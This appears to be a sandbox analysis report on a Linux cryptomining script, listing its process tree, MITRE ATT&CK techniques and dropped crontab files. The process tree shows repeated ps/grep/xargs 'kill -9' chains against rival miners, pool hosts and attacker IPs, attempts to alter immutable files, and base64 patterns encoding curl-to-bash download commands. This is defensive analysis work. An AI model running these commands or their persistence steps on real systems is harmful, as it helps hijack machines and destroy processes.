PID:2228

/bin/ps
ps aux
2⤵
PID:2227

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2236

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2235

/bin/grep
grep ksoftirqds
2⤵
PID:2234

/bin/grep
grep -v grep
2⤵
PID:2233

/bin/ps
ps aux
2⤵
PID:2232

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2241

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2240

/bin/grep
grep netdns
2⤵
PID:2239

/bin/grep
grep -v grep
2⤵
PID:2238

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:2237

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2246

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2245

/bin/grep
grep watchdogs
2⤵
PID:2244

/bin/grep
grep -v grep
2⤵
PID:2243

/bin/ps
ps aux
2⤵
PID:2242

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2258

/bin/grep
grep -v postgresq1
2⤵
PID:2256

/bin/grep
grep -v kdevtmpfsi
2⤵
PID:2255

/usr/bin/awk
awk "\$3>80.0{print \$2}"
2⤵
PID:2257

/bin/grep
grep -v atd
2⤵
PID:2254

/bin/grep
grep -v apache2
2⤵
PID:2253

/bin/grep
grep -v dblaunched
2⤵
PID:2252

/bin/grep
grep -v dblaunchs
2⤵
PID:2251

/bin/grep
grep -v dblaunch
2⤵
PID:2250

/bin/grep
grep -v root
2⤵
PID:2249

/bin/grep
grep -v grep
2⤵
PID:2248

/bin/ps
ps aux
2⤵
PID:2247

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2264

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2263

/bin/grep
grep " ps"
2⤵
PID:2262

/bin/grep
grep -v aux
2⤵
PID:2261

/bin/grep
grep -v grep
2⤵
PID:2260

/bin/ps
ps aux
2⤵
PID:2259

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2269

/usr/bin/cut
cut -c 9-15
2⤵
PID:2268

/bin/grep
grep sync_supers
2⤵
PID:2267

/bin/grep
grep -v grep
2⤵
PID:2266

/bin/ps
ps aux
2⤵
PID:2265

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2274

/usr/bin/cut
cut -c 9-15
2⤵
PID:2273

/bin/grep
grep cpuset
2⤵
PID:2272

/bin/grep
grep -v grep
2⤵
PID:2271

/bin/ps
ps aux
2⤵
PID:2270

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2280

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2279

/bin/grep
grep "x]"
2⤵
PID:2278

/bin/grep
grep -v aux
2⤵
PID:2277

/bin/grep
grep -v grep
2⤵
PID:2276

/bin/ps
ps aux
2⤵
PID:2275

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2286

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2285

/bin/grep
grep "sh] <"
2⤵
PID:2284

/bin/grep
grep -v aux
2⤵
PID:2283

/bin/grep
grep -v grep
2⤵
PID:2282

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2281

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2292

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2291

/bin/grep
grep " \\[]"
2⤵
PID:2290

/bin/grep
grep -v aux
2⤵
PID:2289

/bin/grep
grep -v grep
2⤵
PID:2288

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:2287

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2297

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2296

/bin/grep
grep /tmp/l.sh
2⤵
PID:2295

/bin/grep
grep -v grep
2⤵
PID:2294

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:2293

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2302

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2301

/bin/grep
grep /tmp/zmcat
2⤵
PID:2300

/bin/grep
grep -v grep
2⤵
PID:2299

/bin/ps
ps aux
2⤵
PID:2298

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2307

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2306

/bin/grep
grep hahwNEdB
2⤵
PID:2305

/bin/grep
grep -v grep
2⤵
PID:2304

/bin/ps
ps aux
2⤵
PID:2303

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2312

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2311

/bin/grep
grep CnzFVPLF
2⤵
PID:2310

/bin/grep
grep -v grep
2⤵
PID:2309

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:2308

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2317

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2316

/bin/grep
grep CvKzzZLs
2⤵
PID:2315

/bin/grep
grep -v grep
2⤵
PID:2314

/bin/ps
ps aux
2⤵
PID:2313

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2322

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2321

/bin/grep
grep aziplcr72qjhzvin
2⤵
PID:2320

/bin/grep
grep -v grep
2⤵
PID:2319

/bin/ps
ps aux
2⤵
PID:2318

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2327

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2326

/bin/grep
grep /tmp/udevd
2⤵
PID:2325

/bin/grep
grep -v grep
2⤵
PID:2324

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:2323

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2332

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2331

/bin/grep
grep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA
2⤵
PID:2330

/bin/grep
grep -v grep
2⤵
PID:2329

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2328

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2337

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2336

/bin/grep
grep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo
2⤵
PID:2335

/bin/grep
grep -v grep
2⤵
PID:2334

/bin/ps
ps aux
2⤵
PID:2333

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2342

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2341

/bin/grep
grep sustse
2⤵
PID:2340

/bin/grep
grep -v grep
2⤵
PID:2339

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:2338

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2347

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2346

/bin/grep
grep sustse3
2⤵
PID:2345

/bin/grep
grep -v grep
2⤵
PID:2344

/bin/ps
ps aux
2⤵
PID:2343

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2353

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2352

/bin/grep
grep wget
2⤵
PID:2351

/bin/grep
grep mr.sh
2⤵
PID:2350

/bin/grep
grep -v grep
2⤵
PID:2349

/bin/ps
ps aux
2⤵
PID:2348

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2359

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2358

/bin/grep
grep curl
2⤵
PID:2357

/bin/grep
grep mr.sh
2⤵
PID:2356

/bin/grep
grep -v grep
2⤵
PID:2355

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:2354

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2365

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2364

/bin/grep
grep wget
2⤵
PID:2363

/bin/grep
grep 2mr.sh
2⤵
PID:2362

/bin/grep
grep -v grep
2⤵
PID:2361

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2360

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2371

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2370

/bin/grep
grep curl
2⤵
PID:2369

/bin/grep
grep 2mr.sh
2⤵
PID:2368

/bin/grep
grep -v grep
2⤵
PID:2367

/bin/ps
ps aux
2⤵
PID:2366

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2377

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2376

/bin/grep
grep wget
2⤵
PID:2375

/bin/grep
grep cr5.sh
2⤵
PID:2374

/bin/grep
grep -v grep
2⤵
PID:2373

/bin/ps
ps aux
2⤵
PID:2372

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2383

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2382

/bin/grep
grep curl
2⤵
PID:2381

/bin/grep
grep cr5.sh
2⤵
PID:2380

/bin/grep
grep -v grep
2⤵
PID:2379

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2378

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2389

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2388

/bin/grep
grep wget
2⤵
PID:2387

/bin/grep
grep logo9.jpg
2⤵
PID:2386

/bin/grep
grep -v grep
2⤵
PID:2385

/bin/ps
ps aux
2⤵
PID:2384

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2395

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2394

/bin/grep
grep curl
2⤵
PID:2393

/bin/grep
grep logo9.jpg
2⤵
PID:2392

/bin/grep
grep -v grep
2⤵
PID:2391

/bin/ps
ps aux
2⤵
PID:2390

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2400

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2399

/bin/grep
grep j2.conf
2⤵
PID:2398

/bin/grep
grep -v grep
2⤵
PID:2397

/bin/ps
ps aux
2⤵
PID:2396

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2406

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2405

/bin/grep
grep wget
2⤵
PID:2404

/bin/grep
grep luk-cpu
2⤵
PID:2403

/bin/grep
grep -v grep
2⤵
PID:2402

/bin/ps
ps aux
2⤵
PID:2401

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2412

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2411

/bin/grep
grep curl
2⤵
PID:2410

/bin/grep
grep luk-cpu
2⤵
PID:2409

/bin/grep
grep -v grep
2⤵
PID:2408

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2407

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2418

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2417

/bin/grep
grep wget
2⤵
PID:2416

/bin/grep
grep ficov
2⤵
PID:2415

/bin/grep
grep -v grep
2⤵
PID:2414

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2413

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2424

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2423

/bin/grep
grep curl
2⤵
PID:2422

/bin/grep
grep ficov
2⤵
PID:2421

/bin/grep
grep -v grep
2⤵
PID:2420

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:2419

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2430

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2429

/bin/grep
grep wget
2⤵
PID:2428

/bin/grep
grep he.sh
2⤵
PID:2427

/bin/grep
grep -v grep
2⤵
PID:2426

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2425

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2436

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2435

/bin/grep
grep curl
2⤵
PID:2434

/bin/grep
grep he.sh
2⤵
PID:2433

/bin/grep
grep -v grep
2⤵
PID:2432

/bin/ps
ps aux
2⤵
PID:2431

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2442

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2441

/bin/grep
grep wget
2⤵
PID:2440

/bin/grep
grep miner.sh
2⤵
PID:2439

/bin/grep
grep -v grep
2⤵
PID:2438

/bin/ps
ps aux
2⤵
PID:2437

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2448

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2447

/bin/grep
grep curl
2⤵
PID:2446

/bin/grep
grep miner.sh
2⤵
PID:2445

/bin/grep
grep -v grep
2⤵
PID:2444

/bin/ps
ps aux
2⤵
PID:2443

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2454

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2453

/bin/grep
grep wget
2⤵
PID:2452

/bin/grep
grep nullcrew
2⤵
PID:2451

/bin/grep
grep -v grep
2⤵
PID:2450

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2449

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2460

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2459

/bin/grep
grep curl
2⤵
PID:2458

/bin/grep
grep nullcrew
2⤵
PID:2457

/bin/grep
grep -v grep
2⤵
PID:2456

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:2455

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2465

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2464

/bin/grep
grep 107.174.47.156
2⤵
PID:2463

/bin/grep
grep -v grep
2⤵
PID:2462

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2461

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2470

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2469

/bin/grep
grep 83.220.169.247
2⤵
PID:2468

/bin/grep
grep -v grep
2⤵
PID:2467

/bin/ps
ps aux
2⤵
PID:2466

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2475

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2474

/bin/grep
grep 51.38.203.146
2⤵
PID:2473

/bin/grep
grep -v grep
2⤵
PID:2472

/bin/ps
ps aux
2⤵
PID:2471

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2480

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2479

/bin/grep
grep 144.217.45.45
2⤵
PID:2478

/bin/grep
grep -v grep
2⤵
PID:2477

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2476

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2485

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2484

/bin/grep
grep 107.174.47.181
2⤵
PID:2483

/bin/grep
grep -v grep
2⤵
PID:2482

/bin/ps
ps aux
2⤵
PID:2481

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2490

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2489

/bin/grep
grep 176.31.6.16
2⤵
PID:2488

/bin/grep
grep -v grep
2⤵
PID:2487

/bin/ps
ps aux
2⤵
PID:2486

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2495

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2494

/bin/grep
grep mine.moneropool.com
2⤵
PID:2493

/bin/grep
grep -v grep
2⤵
PID:2492

/bin/ps
ps auxf
2⤵
PID:2491

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2500

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2499

/bin/grep
grep pool.t00ls.ru
2⤵
PID:2498

/bin/grep
grep -v grep
2⤵
PID:2497

/bin/ps
ps auxf
2⤵
- Reads CPU attributes
PID:2496

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2505

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2504

/bin/grep
grep xmr.crypto-pool.fr:8080
2⤵
PID:2503

/bin/grep
grep -v grep
2⤵
PID:2502

/bin/ps
ps auxf
2⤵
- Reads runtime system information
PID:2501

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2510

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2509

/bin/grep
grep xmr.crypto-pool.fr:3333
2⤵
PID:2508

/bin/grep
grep -v grep
2⤵
PID:2507

/bin/ps
ps auxf
2⤵
PID:2506

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2515

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2514

/bin/grep
grep "[email protected]"
2⤵
PID:2513

/bin/grep
grep -v grep
2⤵
PID:2512

/bin/ps
ps auxf
2⤵
PID:2511

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2520

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2519

/bin/grep
grep monerohash.com
2⤵
PID:2518

/bin/grep
grep -v grep
2⤵
PID:2517

/bin/ps
ps auxf
2⤵
- Reads runtime system information
PID:2516

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2525

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2524

/bin/grep
grep /tmp/a7b104c270
2⤵
PID:2523

/bin/grep
grep -v grep
2⤵
PID:2522

/bin/ps
ps auxf
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2521

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2530

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2529

/bin/grep
grep xmr.crypto-pool.fr:6666
2⤵
PID:2528

/bin/grep
grep -v grep
2⤵
PID:2527

/bin/ps
ps auxf
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2526

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2535

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2534

/bin/grep
grep xmr.crypto-pool.fr:7777
2⤵
PID:2533

/bin/grep
grep -v grep
2⤵
PID:2532

/bin/ps
ps auxf
2⤵
PID:2531

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2540

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2539

/bin/grep
grep xmr.crypto-pool.fr:443
2⤵
PID:2538

/bin/grep
grep -v grep
2⤵
PID:2537

/bin/ps
ps auxf
2⤵
- Reads CPU attributes
PID:2536

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2545

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2544

/bin/grep
grep stratum.f2pool.com:8888
2⤵
PID:2543

/bin/grep
grep -v grep
2⤵
PID:2542

/bin/ps
ps auxf
2⤵
PID:2541

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2550

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2549

/bin/grep
grep xmrpool.eu
2⤵
PID:2548

/bin/grep
grep -v grep
2⤵
PID:2547

/bin/ps
ps auxf
2⤵
PID:2546

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2554

/usr/local/sbin/kill
kill -9 2552
3⤵
PID:2555

/usr/local/bin/kill
kill -9 2552
3⤵
PID:2555

/usr/sbin/kill
kill -9 2552
3⤵
PID:2555

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2553

/bin/grep
grep xiaoyao
2⤵
PID:2552

/bin/ps
ps auxf
2⤵
PID:2551

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

1

T1053

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Indicator Removal

1

T1070

Credential Access

Discovery

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/log_rot

Filesize
5B

MD5
727479ef7cedf30c03459bec7d87b0f0

SHA1
2082e7f715f058acab2398d25d135cf5f4c0ce41

SHA256
29872037c9573567744ef10ed2de57864ded7554c9fa2ef03fc1244c65794ba6

SHA512
4cb59d37f8481f9bb2745f494baa0910a68aad40ac2903ef1513547e091e1e772a5f9436f789ab91fcafb75b8a28c2112ede89004be41f33c01d936b542ca6ba

Download Submit
/var/spool/cron/crontabs/tmp.OaPvOd

Filesize
246B

MD5
16cd26d91db86df001b671cd4f697f0c

SHA1
3eba4c82a36ab1adde19e877d1198ec35f17f20c

SHA256
6ec848a1ce47a569e7eff95b3d7c29e8ea2eda3707dae213bca152cb4cd35f34

SHA512
959503c4a3f6148ec948cd2649d3eb2674fde82433d8c20aa0578e1516764872ae0d21f0ecc0be8a4b5ac68898295184a5d3e309b5b19e5eb26730460856645e

Download Submit
/var/spool/cron/crontabs/tmp.yY7qla

Filesize
175B

MD5
9fc238a1da1e7e4ea728c0816f00c51f

SHA1
514eee7c59a387a8bd330fad31d32889c7754ef4

SHA256
15f2f0fbd62e2c0c592c278e146a59e0847f39c0b5ecd0f0e10578b9ca1c20b3

SHA512
5c8281eedc41b4a62b5ebce2717b6d17703e7f82575f68cf37b8e1edbd9ff03b4bd54f6438eb70defef06754620e2a7668600697a0cb72055c83bd9cd039295f

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads